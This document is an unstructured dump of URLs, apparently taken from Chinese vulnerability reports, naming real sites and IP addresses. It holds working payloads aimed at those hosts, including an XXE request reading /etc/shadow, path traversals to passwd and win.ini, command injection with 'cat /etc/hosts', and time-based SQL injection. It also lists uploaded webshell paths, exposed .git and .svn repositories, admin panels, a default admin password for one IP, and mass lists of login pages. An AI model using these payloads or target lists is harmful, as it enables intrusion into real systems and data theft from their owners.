http://www.s10000.com/ubsiServlet?xml=%3C!DOCTYPE%20foo%20[%3C!ENTITY%20xxe%20SYSTEM%20%22file:///etc/shadow%22%3E]%3E%3Cubsi%20service=%22service%22%20method=%22method%22%3E%3Cobject%20type=%22Integer%22%3E%26xxe;%3C/object%3E%3C/ubsi%3E http://game.kuwo.cn/g/st/NewerIndex_2014这里,登陆位置没有验证码验证的机制 cds.sysu.edu.cn/AdminSysu/ http://meijiamei.xiaozufan.com/index.php?s=/Public/reg http://yingu1.xiaozufan.com/Account http://skb.ezu.cn/ebtcms/ebaitian_login.jsp http://skb.ezu.cn/show.jsp?id=109 http://www.chuyufood.com/ebtcms/ebaitian_login.jsp http://www.chuyufood.com/show.jsp?id=13 http://zsxx.hbcszyxy.cn/ebtcms/ebaitian_login.jsp http://zsxx.hbcszyxy.cn/show.jsp?id=183 http://www.trschem.com/ebtcms/ebaitian_login.html http://www.trschem.com/show.jsp?id=27 http://sc.nanet.cn:8181/ebtcms/ebaitian_login.jsp http://sc.nanet.cn:8181/show.jsp?id=14 http://www.trschem.com/ebaitiancms/ebaitian_login.jsp http://www.trschem.com/show.jsp?id=21 http://www.whladp.com/show.jsp?id=5 http://hbdmjt.cjxy.edu.cn/ebtcms/ebaitian_login.jsp http://hbdmjt.cjxy.edu.cn/show.jsp?id=16 http://www.jikexueyuan.com/member/changeEmail http://www.jikexueyuan.com/member/sendemail http://www.jikexueyuan.com/member/sendPhoneMsg http://cxdvbmanage.cxmd.net/workorderadmin/default.aspx http://cxdvbmanage.cxmd.net/WorkOrderList.aspx?WorkName=-1 http://cxdvbmanage.cxmd.net/Default.aspx?WorkID=285769 http://cxdvbmanage.cxmd.net/Default.aspx?WorkID=285770 http://nanjing.888ly.cn/Account/bill_detail_list?id=8621&page=2 http://nanjing.888ly.cn/OrderLog/order_details/number/NJ20158879120275 http://nanjing.888ly.cn/OrderLog/order_details/number/NJ20158810145553 http://101.200.0.198/Admin/Manage/Login http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// https://**.**.**.**/ubsiServlet?xml= file:/// 
http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// www.renrenche.com http://**.**.**.**/shnewsshow.asp?id=26753 http://**.**.**.**/gjxfnewsshow.asp?id=26758 http://**.**.**.**/noticecshow.asp?id=22582 http://**.**.**.**/caseshow.asp?id=26215 http://**.**.**.**/jobsshow.asp?id=108 http://218.17.149.243:4567/manage/upload/upload.html http://218.17.149.243:4567/manage/upload/lyzx_image.jsp http://www.gyzq.com.cn:8081/manage/upload/upload.html http://www.gyzq.com.cn:8081/manage/upload/lyzx_image.jsp http://shouhou.renrenche.com/ http://**.**.**.**/index.php/Home/article/catePage/parentID/0/cat_id/1463* https://**.**.**.**/member/forget_pwd.htm,输入自己的手机号获取验证码。 http://**.**.**.**/manage/ http://**.**.**.**/manage/ https://mall.essence.com.cn/3g/osoa/views/pages/login/loginBase.html http://ceb.gmnc.org.cn/ http://bsb-yq.gmnc.org.cn/ http://hxb-xc.gmnc.org.cn/ http://meiji-info.gmnc.org.cn/ http://hxb-pf.gmnc.org.cn/ http://**.**.**.**/search/FileServlet http://**.**.**.**/search/project/projectLeft.jsp http://**.**.**.**/search/ProjectServlet http://**.**.**.**/wjjw/feeslicense/feeslicense.html http://**.**.**.**/wjjw/index/lyxq.jsp http://**.**.**.**/wjjw/other/consultCheck http://**.**.**.**/wjjw/other/reportCheck http://**.**.**.**/wjjw/search/project/projectLeft.jsp http://**.**.**.**/wjjw/search/project/table1.jsp http://**.**.**.**/wjjw/search/ProjectServlet http://**.**.**.**/wjsfglw/lgindex.jsp http://**.**.**.**/search/ http://**.**.**.**/search/FileServlet http://**.**.**.**/search/index.jsp http://**.**.**.**/search/name/table.jsp http://**.**.**.**/search/project/table1.jsp http://**.**.**.**/search/ProjectServlet http://**.**.**.**/wjjw/feeslicense/feeslicense.html http://**.**.**.**/wjjw/index/lylist.html http://**.**.**.**/wjjw/search/ http://**.**.**.**/wjjw/search/index.jsp http://**.**.**.**/wjjw/search/project/table1.jsp http://**.**.**.**/wjjw/search/ProjectServlet 
http://**.**.**.**/wjsfglw/ http://**.**.**.**/wjsfglw/wjgl/webEditor/upload/files/193128225153734165112206394314244622.jsp http://202.195.40.54:8080/ http://222.75.160.211:8080/ http://vgate.nwnu.edu.cn/ http://60.165.175.7:8080/ http://202.200.168.97/ http://202.116.192.41/ http://218.76.139.4:8080/ http://183.169.128.22:8080/ https://211.67.177.73/ https://mail.huanghuai.edu.cn/ http://218.75.26.87:8080/ http://210.32.43.230/ http://60.173.215.12:8080/ http://202.111.154.227:8080/ http://222.186.201.4:8080/ http://210.47.0.139:8080/ https://219.148.40.134/ https://mail.hecic.com.cn/ https://mail.julisolar.com/ https://mail.juligroup.com/ http://117.79.233.34:8080/ http://202.195.40.54:8080/ http://www.vko.cn/safety/getpwdbyphone.html http://adm.donews.com/ http://adm.donews.com:80/ http://**.**.**.**/users/password/new http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://open.sogou.com/index.php/tResource/xmltool address:sqlmap.py http://**.**.**.**/Service/GetSchoolOverview.ashx?TYPEID= http://**.**.**.**/Service/GetSchoolOverview http://**.**.**.** http://**.**.**.**/cgi-bin/DynamicPage.cgi http://**.**.**.**/cgi-bin/DynamicPage.cgi?template=../../../../../../../../../../etc/passwd http://yeyou.mop.com/payment/yee_mobile.aspx?code=UNICOM http://apicloud.com/getAllMdStore?startNum=0&size=15&platform=-1&type=0&subclass=0&order=0&searchByName=true&searchName=11 http://**.**.**.**/ http://mapi.miliyo.com/locations/update?_ua=i|8.3|0|30|appstore|9c60933948973dfe894d119f719f6294|1125|2001|1|cn|7969d3f0d4dc0d8d711af82c6832bf1d http://mapi.miliyo.com/home/index/?uid=48347109&_ua=i%7C8.3%7C1%7C30%7Cappstore%7C9c60933948973dfe894d119f719f6294%7C1125%7C2001%7C1%7Ccn%7C7969d3f0d4dc0d8d711af82c6832bf1d http://www.sysu-ys.com/shownews.asp?id=527 http://**.**.**.**/admin/index.asp http://**.**.**.**/admin/index.asp http://buy.ufida.com.cn/File/ http://buy.ufida.com.cn/images/ 
http://**.**.**.**/login.shtml http://ygjrex.sinosig.com/tabid/161/Default.aspx?returnurl=%2fdefault.aspx http://**.**.**.**/index.php?m=News&a=detail http://**.**.**.**/index.php?m=News&a=detail http://122.11.39.100:8080/zabbix/ http://**.**.**.**:10000/css/1111.csv http://**.**.**.** http://**.**.**.** http://115.29.100.114:8888/APP/suggest/suggest.jsp http://v.qq.com/bar/10291/?ptag=website.video.videodetail.web&platform=0 http://v.qq.com/bar/10291/post/6039781881996722892/comment http://**.**.**.**/cx/userzc.asp http://**.**.**.**/cx/userzc.asp http://oncloud2.quanshi.com/uccserver/uccapi/common/loglist http://oncloud2.quanshi.com/uccserver/uccapi/common/loglist?page=1&count=20&user_id=1267616&user_account=&description=&device_type=0 http://wap.cnmo.com/doc.php?docid=64850 http://**.**.**.**:8080/wscgs/default.aspx http://**.**.**.**/index.html http://**.**.**.**/ http://**.**.**.**/WifiBusInterface/transfer/line!getLineAll.action http://**.**.**.**/WifiBusInterface/one8.jsp http://**.**.**.**/WifiBusInterface/cmd.jsp http://**.**.**.**/shownews.asp http://**.**.**.**/shownews.asp http://www.wooyun.org/bugs/wooyun-2015-0135415/trace/120b8b8a812a0a46a132b4eb346d9254 http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://mis.998.com:8065/Construct_Detail_New.aspx?projectid=17再次上传木马http://mis.998.com:8065/upfiles/635756074685719847wooyun.aspx http://open.lianlianpay.com/ http://open.lianlianpay.com/wp-content/uploads/2014/08/web_DEMO-2015-07-24-092030.rar https://zh.essence.com.cn/kess/pages/index.jsp http://boxadmin.lianlianbox.com/这个是后台地址 http://demo1.wangdaixitong.com?plugins&q=areas&name=&type=p,c&area=1 http://123.124.249.86/Login.aspx http://www.sinopectg.com/ www.codi.cc/admin http://visa.ilvxing.com/ucenter/user/updateUserinfo http://www.yiqifa.com/ www.anymacro.com http://www.hlslm.cn/AboutMe/id/57/p_id/31/f_id/39 http://www.hlslm.cn/Content/uid/16863 
http://www.hlslm.cn/AboutMe/id/35/p_id/30 www.1v1buxi.net www.1v1buxi.org/huatong www.1v1buxi.org/zhongqing www.aicansi.com www.aicansi.com/huatong www.bf1v1.org www.bfdeu.com/zhongqing www.bfdeu.com/zhongqing2 www.bliuxue.net www.cpbo.cn/huatong www.k12-edu.org/zhongqing www.libro.cn/huatong www.mupingwang.com www.qzj999.com/zhongqing www.sdfyme.com/huatong www.tzun.cn/zhongqing www.ydy114.org/huatong http://**.**.**.** http://**.**.**.**/home/list.php?class_id=1 coding:utf-8 http://**.**.**.**/ http://**.**.**.**/webhtmlbjq/upload.asp http://**.**.**.**/login/index.asp http://www.hlslm.cn/AboutMe/id/38/p_id/30意见反馈 http://admin.hlslm.cn/Admin/Index/index#PayForm http://admin.hlslm.cn/Admin/Index/index#PayForm http://www.jzq001.com/admin.php?action=plugins&operation=config&do=48 http://www.jzq001.com/admin.php?frames=yes&action=plugins&operation=config&do=48 http://www.saike.com.cn/admin/ http://admin.hlslm.cn/Admin/Index/index#PayForm http://admin.hlslm.cn/Admin/Index/index#PayForm http://admin.hlslm.cn/Admin/Index/index http://221.193.221.207/admin/index.php?controller=AdminLogin&action=login http://221.193.221.207 http://channeldata.open.com.cn:8080/login.jsp http://124.127.180.196/library/login.action http://wsga.asga.gov.cn/edit/ewebeditor.htm http://gps.3g-elec.com/ http://wdc66.cn/lend/index.php?type=1 http://zzjz2.edong.com/news/class/index.php?author=&catid=0&key=&myord=dtime&myshownums=&page=2&showdate=&showtj= http://zsb.hrbcu.edu.cn/showInfo.php?type=xinxi&&id=318 http://zsb.hrbcu.edu.cn/admin/ http://www.sifangwy.com/ http://**.**.**.**/jiayou/changepwd.aspx http://**.**.**.**/console/login.aspx http://www.spider.com.cn/newuserjquery.action http://git.oschina.net/einsqing/wemall/repository/archive?ref=master http://tc.homelink.com.cn/ http://**.**.**.**/shownews.asp?id=91 http://edu.gd.chinamobile.com/网址 http://**.**.**.**/uploadfile/2013/1024/20131024021316226.txt http://**.**.**.** https://erp.cernet.com/ 
https://**.**.**.**/b3717898/AutoTestDemo/blob/a26d5c0fec942b6d7b438ac55352dbf15b8cbf9e/src/com/yum/boh/autotest/sele/demo/wang_xin/Test_wangxin.java http://**.**.**.** http://**.**.**.** http://**.**.**.**/xg.asp http://**.**.**.**/gajj_admin/admin_sysadmin/admin_sz_add.asp http://**.**.**.**/gajj_admin/cyzx_edit/admin_login.asp www.hlslm.cn http://channel.wepiao.com/index.php?r=public/register http://**.**.**.**/index.php?a=search http://www.zhengtugps.com/news_info.php?id=252 http://**.**.**.**/courses/courses_content.jsp?id=30 http://122.11.33.78/CdnDeleveMdfy.php?reload=1&cdnid=%22||cat%20/etc/hosts||echo%20%22ok http://m.houqiqi.cn/wap/usercenter.do?method=toUserOrderDetail&orderId=14768 http://m.houqiqi.cn/wap/usercenter.do?method=toUserOrderDetail&orderId=17868 http://**.**.**.**/install/ http://ilife.homelink.com.cn/aigou/?c=index&a=orderbuy&id=106714 http://translation.transn.com/loginAction!loginIndex.iol https://uniform.quanshi.com/rest/account/mobile/getConferencePassword http://**.**.**.**//api.php?op=dealer&act=get_city_list&province=120000 http://**.**.**.**:8000/OA_HTML/AppsLogin http://**.**.**.**//api.php?op=dealer&act=get_city_list&province=120000 http://**.**.**.**//api.php?op=dealer&act=get_city_list&province=120000 https://github.com/24hlighting/toolbox/blob/951feeef8e35f9b2f59ecee9416c4103dbefbe66/notes/%E8%B4%A6%E5%8F%B7%E7%AE%A1%E7%90%86.txt http://renpingqing@dev.highso.com.cn/svn/project/app/Android/ http://dev.highso.org/svn/project/public/产品/嗨学二期/ testin:lxpopo710@163.com http://liaoliangbin@dev.highso.org/svn/project/public/ wifi:SSID http://open.gaitu.com/ http://open.gaitu.com/admin http://www.5288.com/xxxx.asp?chrspbh=101378 http://**.**.**.**/chinfo/chuser/view.asp?id=37 http://**.**.**.**/admin/ http://wt.10006.info/login.jsp http://js.10006.info/kuandai.do?area=1 http://61.191.18.242:8080/oa/windex.jsp http://**.**.**.**/mail3.php http://cps.yaochufa.com/adefault/public/register http://cps.yaochufa.com/admini/cpsuser/index 
http://cps.yaochufa.com/admini#2_1 http://cps.yaochufa.com/admini/cpsuser/index http://www.hlslm.cn/ http://bbs.jzq001.com/forum.php?mod=viewthread&tid=46569 http://bbs.jzq001.com/space-uid-42985.html http://gps.3g-elec.com/loginpage/sanji/index.html http://www.hktv.tv/e/extend/say/p_index.php?classid=88&id=347&num=5&order=1&sub=60 http://www.cetools.cn/index.php/cetools/login弱口令蛮多的 http://**.**.**.**/notice.jsp?lbfl=btwj存在注入漏洞 http://opt.op.esf.sina.com.cn/login https://i.gtja.com/evercos/advertising/getSearchListBySign.json?matchtag=1 http://www.6816.com/ http://www.yaofangwang.com/ http://**.**.**.**/news_list.asp?parentID=1&type=1&topPage=1&keyWord= http://member.360hitao.com/member/ashx/myinfo.ashx?methods=Save&coun=CN&name=%u9A6C%u4E91&fN=Ma&lN=Yun&carid=&sex=0&pcode=CNBJ&ccode=null&mobi=13313362313&addr1=%u8FD9%u91CC%u662F%u4E4C%u4E91&add2=undefined&zipcode=111111&tel=&web=undefined&qq=&msn=undefined&remark=&ruEmail=wooyun11111@163.com&_=1440076644567 http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1 http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1 http://**.**.**.**/loginAction!userLogin.do http://opt.op.esf.sina.com.cn/ http://opt.op.esf.sina.com.cn/hotdot/findcode http://opt.op.esf.sina.com.cn/company/all http://opt.op.esf.sina.com.cn/company/communityall www.setv.sh.cn http://photo.shlll.net http://www.shlll.net http://wk.shlll.net http://renwen.shlll.net http://chongming.shlll.net http://**.**.**.**/bugs/wooyun-2010-077350 http://www.163disk.com/data/create.php http://**.**.**.**/?app_act=member/login_reg&type=login http://devtools.opera.com/../../../../../../../etc/hosts http://**.**.**.**/supplier/checkLogin.shtml;fxWLCookie=LC14VVvDmsVhpnQjLpbGtSV9TkGN8pTqltS0pXTqXCLKQDVGPv2w!-1500902718!NONE http://www.iapp.ruc.edu.cn/admin/login.asp http://www.iapp.ruc.edu.cn/xml/cms/.asp/201582071572049.gif http://wen.58.com/question/answer.html 
http://www.kuajing.com/article-23.html,如图所示: http://www.kuajing.com/index.php?act=order_query,输入订单号:7000000003274301,如图所示: http://www.zhihuiranqi.com/html/pc/third/rqjjfarqjjfarqxljcxt.html http://218.56.58.36:8401/log-form.action http://218.56.58.36:8400 http://m.dongchenghotels.com/app/userForget http://112.96.29.107/.svn/ svn:wc:ra_dav:version-url svn:wc:ra_dav:version-url https://115.29.226.98:10777/svn/unicom https://115.29.226.98:10777/svn/unicom https://gd.mail.chinaunicom.cn/ http://financehuawei.hiall.com.cn/data.rar http://localhost/chart/tmp-upload-images/m7lrv.php http://**.**.**.**/Help/Help.aspx http://**.**.**.**/ http://m.wingontravel.com/RestAPI/Wireless/banner?key=h5_page http://m.wingontravel.com/RestAPI/Wireless/banner?key=h5_page height:20px;BORDER http://**.**.**.**/nullshellname.jsp https://www.qh119.gov.cn/src/system/login.php?login_retry=true https://115.239.246.102/src/system/login.php?login_retry=true https://111.1.82.143/src/system/login.php?login_retry=true https://220.173.107.90/src/system/login.php?login_retry=true https://59.46.73.106/src/system/login.php?login_retry=true https://www.xn--3dsz23cqb341isz0akob.com/src/system/login.php?login_retry=true https://202.103.238.229/src/system/login.php?login_retry=true https://116.77.32.13:8443/src/system/login.php https://116.77.32.3:8443/src/system/login.php https://116.77.32.4:8443/src/system/login.php https://222.179.180.74:8443/src/system/login.php https://116.77.32.11:8443/src/system/login.php https://210.21.231.102/src/system/login.php https://116.77.32.12:8443/src/system/login.php https://116.77.32.10:8443/src/system/login.php https://116.77.32.2:8443/src/system/login.php https://120.196.138.212:8443/src/system/login.php https://218.93.17.154:8443/src/system/login.php https://218.25.140.137:8443/src/system/login.php https://124.93.200.105:8443/src/system/login.php https://218.26.248.71/src/system/login.php https://211.142.19.11/src/system/login.php 
https://202.97.152.130/src/system/login.php https://www.lt.lskjd.gov.cn/src/system/login.php https://124.93.200.109:8443/src/system/login.php https://218.26.24.146:8443/src/system/login.php https://211.142.24.77:8443/src/system/login.php https://124.93.200.108:8443/src/system/login.php https://124.93.200.100:8443/src/system/login.php https://110.249.216.198/src/system/login.php https://hbsrfb.gov.cn/src/system/login.php http://116.95.130.3/src/system/login.php https://222.74.54.234:8443/src/system/login.php https://222.74.54.234/src/system/login.php https://116.95.130.3:8443/src/system/login.php https://218.21.230.154:8443/src/system/login.php https://218.26.1.75:8443/src/system/login.php http://60.210.101.238/src/system/login.php https://211.142.29.10/src/system/login.php https://218.26.164.26/src/system/login.php https://www.yucoffee.com/src/system/login.php https://en.diyuan.cc/src/system/login.php https://restartclub.com/src/system/login.php https://58.22.6.39:8443/src/system/login.php https://218.26.4.186/src/system/login.php https://182.151.197.195/src/system/login.php https://220.193.65.237/src/system/login.php https://220.193.65.236/src/system/login.php https://220.193.65.238/src/system/login.php https://183.6.133.179/src/system/login.php https://220.166.83.98/src/system/login.php https://220.193.65.238:8443/src/system/login.php https://222.169.100.142/src/system/login.php https://182.151.197.195:8443/src/system/login.php https://218.56.144.171/src/system/login.php https://27.195.159.2/src/system/login.php https://218.56.144.172/src/system/login.php https://www.taaic.gov.cn/src/system/login.php https://220.193.65.234:8443/src/system/login.php https://www.gzzygts.com/src/system/login.php https://www.zyhsj.com/src/system/login.php https://58.22.6.40:8443/src/system/login.php https://218.26.168.72/src/system/login.php https://www.yczyzz.cn/src/system/login.php https://218.26.96.71:8443/src/system/login.php https://218.61.70.246:8443/src/system/login.php 
https://222.33.40.27:8443/src/system/login.php https://183.238.241.46:8443/src/system/login.php https://61.138.108.74:8443/src/system/login.php https://61.161.214.62/src/system/login.php https://125.32.94.203:8443/src/system/login.php http://**.**.**.**/admin.php?m=User&a=login http://**.**.**.**/Public/Uploads/baidu/20150820/1440059131746449.jpg/c.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://members.wingontravel.com/Password/ForgetPassword.aspx http://api.waimai.meituan.com/api/v6/user/address/getaddr?ci=10&utm_content=865165021528562&utm_medium=android&uuid=6E53E479BE4C390450FBC1B8E1551565E3930DF16989EF66449CE2FD577D5771&utm_term=30603&utm_campaign=AwaimaiBwaimai&utm_source=1046 http://api.waimai.meituan.com/api/v6/user/address/edit?ci=10&utm_content=865165021528562&utm_medium=android&uuid=6E53E479BE4C390450FBC1B8E1551565E3930DF16989EF66449CE2FD577D5771&utm_term=30603&utm_campaign=AwaimaiBwaimai&utm_source=1046 http://**.**.**.**/ http://cps.yaochufa.com/adefault/tuicode/markad?search_name=1&submit=%E6% http://cps.yaochufa.com/adefault/tuicode/mark?search_name=1&submit=%E6%90%9C%E7%B4%A2 http://cps.yaochufa.com/adefault/tuicode/markad?search_n http://jira.t3.com.cn:8081/secure/Signup!default.jspa http://wiki.t3.com.cn:8090/dashboard.action http://119.254.105.143/ticket/web/web.go?method=policyCal&showId=060671&seatIds=10210985&key=IF4F8DK1IFS891KF9S8FKFD8 http://119.254.105.172:7001/console/login/LoginForm.jsp http://drops.wooyun.org/tips/604 http://119.254.105.180/zabbix/ http://119.254.105.222/zabbix/ http://crm.125job.com/login http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2 http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2 http://chinamobileonline.hiall.com.cn/test.php http://116.228.55.12/ http://61.191.40.114/ http://218.18.104.132/ http://115.168.67.196/ http://219.143.125.111/ http://222.74.229.104/ http://219.148.199.8/ 
http://222.85.88.201/ http://219.148.23.14 http://eb.yaochufa.com/ycfad2014/public/login http://**.**.**.**/cx.asp http://**.**.**.**/cx.asp http://www.chinafoodsltd.com/ http://pos.99-pay.com/customer/operatorLogin.action http://pos.99-pay.com/customer/w.jsp http://fangvip.ganji.com/hr_v2/?c=Auth&a=login http://**.**.**.**/news/search.asp http://**.**.**.**/news/search.asp http://**.**.**.**/Read_News.asp?id=1121 http://**.**.**.**/Read_News.asp?id=1121 http://oa.glsc.com.cn:10040/glzqehr/df_login.do?method=checkLogin&userid=ReeMCd4ylOs%3D&encrypt=y http://oa.glsc.com.cn:10040/glzqehr/personBase.do?method=Df_openLicense&licenseName=c:\boot.ini http://product.cnfol.com/WebSite/ http://182.254.134.152:8080//loginUsers.action http://182.254.134.152:8080/loginOutUsers.action https://**.**.**.**/hsfzxjy/hf-spider http://**.**.**.**/homepage/urllinkset.jsp?topicid http://www.wsl0769.com/viewnews.php?newsid=203 http://admin.wsl0769.com/weixinpl/scene/index.php?customer_id=7024&obj_id=228 http://14.17.121.8/frontend/user.php http://mis.99.com/Default.aspx http://mis.99.com/Default.aspx http://oa.reocar.com:9090 http://runforfun.vanke.com/web/DownFile.aspx?Path=/web.config http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNQ== http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNSBhbmQgc2xlZXAoNSk= http://www.chuangjucf.com/index.php?user&q=action/reg&u= http://www.purenhong.com.cn http://www.purenhong.com.cn/admin/index.asp ip:211.151.70.240 username:admin password:admin http://wooyun.org/bugs/wooyun-2015-0124160 http://ttluniappserver.unicomlabs.com:8088/ServerCU/clientUpdate!askUpgrade.unicom http://www.hrxaey.com/do/jsarticle.php?fid=69&type=pic&rows=4&leng=22&iframeID=article_Pictopic http://**.**.**.**/ http://www.xiaoliangkou.com/passport/forget/ http://yun.lu http://bjtu.yun.lu/user/sendChgPwdEmail http://tsinghua.yun.lu/user/sendChgPwdEmail http://muc.yun.lu/user/sendChgPwdEmail http://bistu.yun.lu/user/sendChgPwdEmail 
http://whu.yun.lu/user/sendChgPwdEmail http://124.192.148.18:80/student/courses/searchCourses http://124.192.148.18:80/student/courses/searchCourses http://112.11.120.62/license!getExpireDateOfDays.action http://58.22.138.34/license!getExpireDateOfDays.action http://112.11.120.62:8080 http://221.2.154.142:8080 http://183.221.242.39:8080 http://123.127.75.182:8080 http://183.129.232.103:8080 http://42.202.133.35:8080 http://123.127.75.181:8080 http://112.11.120.62:8088 http://219.138.141.252:8088 http://218.205.123.2:8088 http://183.246.161.141:8088 http://218.205.127.17:8088 http://117.40.91.101:8088 http://119.7.222.196:8088 http://58.42.241.49:8088 http://221.2.40.236:8088 http://222.38.248.60:8088 http://183.221.242.39:8088 http://123.127.75.182:8088 http://183.129.232.103:8088 http://123.127.75.181:8088 http://42.202.133.35:8088 http://112.11.120.29/preview.php http://112.11.120.34/Web/login http://**.**.**.**/,是中国教育和科研计算机网的一个资源库吧 http://**.**.**.**/director.php?action=click&siteid=505&url=http://**.**.**.**/ http://oa.xiaolajiao.com:8080/seeyon/ http://**.**.**.**/ http://open.huawei.com:8081/data/ http://open.huawei.com:8081/source/ http://61.191.47.110/skyworth/admin/admin_login.php http://ichtf.dbw.cn/online/web.php?id=31230 http://ichtf.dbw.cn/ltd/product/product.php?id=4408 http://ichtf.dbw.cn/615cx/cxxt/product.php?id=4578 https://**.**.**.**/register/register_new01.jsp https://**.**.**.**/findloginpwd/findloginpwd1.jsp http://i.kuwo.cn/US/login.htm?status=4这个接口额,可以看到这个接口的登陆位置是有验证码限制的,但是这个验证码可以绕过,只要输入正确一次抓包之后,就会一直正确 http://m.yichao.cn/login.aspx http://**.**.**.**:8080/pages/lecture.aspx?action=more&id=912 http://**.**.**.**:8080/pages/lecture.aspx?action=more&id=912 http://**.**.**.**:8080/pages/lecture.aspx?action=more&id=912 http://**.**.**.**/phpMyAdmin/ http://**.**.**.**/getCrowdfundingDemand.do http://www.newegg.cn/Ajax/FeedBack/AjaxPostReview.aspx 
t.im/rlo9”在点击网址安装程序后手机立即开始疯狂给通讯录内人员发送该短信。机主立即将手机关机送修。拿到手机了解情况后,二话不说,卸掉手机卡。开始对手机进行检查。找到一款名为微投票的APK。十分可疑。安装时间为1个小时前,正是机主中毒时间。该程序权限有(接受短信,读取联系人数据,写入联系人数据,修改SD卡内容,读取设备状态和身份,发送短信)GG就是他了。(这是在我自己手机安装的,原来的手机修好后还给他了) http://yun.lu/user/securityAuth/sendBindEmail https://github.com/ladykiller/project-workspace/blob/044ec3e3f8d528a4a776cb2f3d1c05a5ba9fb534/workspace-develop/com.fitweber.workdaily/build/classes/mail.properties http://**.**.**.**/fczs/xwxq.jsp?id=1 http://**.**.**.**/wzht/FCKeditor/editor/fckdialog.html http://www.sinoflt.com/swpx/indexNews_zxjj.action?newsType.tag=%E4%B8%AD%E5%BF%83%E7%AE%80%E4%BB%8B www.jobs.uestc.edu.cn http://www.jobs.uestc.edu.cn/login.action http://**.**.**.**/bugs/wooyun-2015-0130569 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.jlsygj.gov.cn/ http://119.254.116.131/jmx-console/ http://www.cmstop.cn/),然后访问用户功能 http://site.cmstop.cn/#/member/index/index?state=enable http://testlink.bj.oupeng.com/login.php http://cms.ku6.com:8080/ http://cms.ku6.com:8080/channel_config/getChannelHomeVideoList.jsp?cid=3 http://cms.ku6.com:8080/login/login.html http://api.resume.hiall.com.cn//.git/config http://61.130.247.180:9504/tyyd_cp/index.action http://ybapi.doyouhike.net/user/show?auth=612a2f689cb25bf78e0070cbd3c284b4&userID=1 http://narya.puahome.com:30551/user_profile/info?user_id=99 http://wooyun.org/bugs/wooyun-2015-0125115 http://wechat.youku.com:80/ http://**.**.**.**/ http://flux.shop.letv.com/fluxWebRf/login.jAct?userLanguage=zh_CN https://www.douban.com/service/auth2/auth?client_id=08710dbc5a7ae51c195329350f70af54&redirect_uri=http%3A%2F%2Fwww.zenlifestore.com%2Flogin%2Fgetloginfordouban&response_type=code dealer.auto.ifeng.com/dealerback/login http://woa.unicomgd.com/moa.htm https://pcmoa.chinaunicom.cn https://pcmoa.chinaunicom.cn http://woa.unicomgd.com/moa.htm http://**.**.**.**:8001/netapply/reg.action存在命令执行漏洞 
http://mycommunity.haier.com.my/home/submitform_quize http://site.cmstop.cn/link/index/list?type=1&offset=0&limit=50&_=1440172313381&sort=desc&category=2 https://112.65.177.221/por/login_psw.csp?rnd=0.19368067595075716 https://112.65.177.221/por/login_psw.csp?rnd=0.19368067595075716 https://112.65.177.221/por/login_psw.csp?rnd=0.19368067595075716 http://hunb.nea.gov.cn http://hdj.nea.gov.cn/index_more2.jsp?typeid=416 http://hunb.nea.gov.cn/action/front/indexAction_queryTopContentByColumn?column.columnId=Col_ywdd&contentPage.curPageNo=1&contentPage.pageSize=20&searchTitle=1%27%22%28%29%26%25%3Cw%3E%3CScRiPt%20%3Ealert%28/wooyun/%29%3C/ScRiPt%3E http://hunb.nea.gov.cn/SCSERC_COMMON/preViewDoc.action PS:/SCSERC_COMMON/preViewDoc.action url:http://**.**.**.**/,产品如下 http://int.api.juhe.cn/.git/config http://webdisk.api.juhe.cn/.git/config http://local.api.juhe.cn/.git/config http://autoconfig.api.juhe.cn/.git/config http://autodiscover.api.juhe.cn/.git/config http://**.**.**.**/detail.php?id=62970 http://**.**.**.**/ http://**.**.**.**/feedback/ http://oa.womaiapp.com/seeyon/index.jsp http://oa.womaiapp.com/seeyon//logs/ctp.log http://oa.womaiapp.com/seeyon//logs/uc.log http://**.**.**.**:80/asklist.asp http://**.**.**.**/ http://oa.ctrl.189.cn/web/login.do https://www.zuoyoufy.com/login http://218.76.215.26:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://113.204.112.229/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://124.133.249.67:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://222.128.125.139:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://60.211.244.146:81/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini http://210.22.52.135:81/ http://58.240.210.122:81/ http://180.166.221.122:81/ http://218.75.205.128:81/ http://**.**.**.**/ErrReport.asp?SpecialID=148 http://**.**.**.**/play1/ListenUrls.asp?id=&name=qq107959 
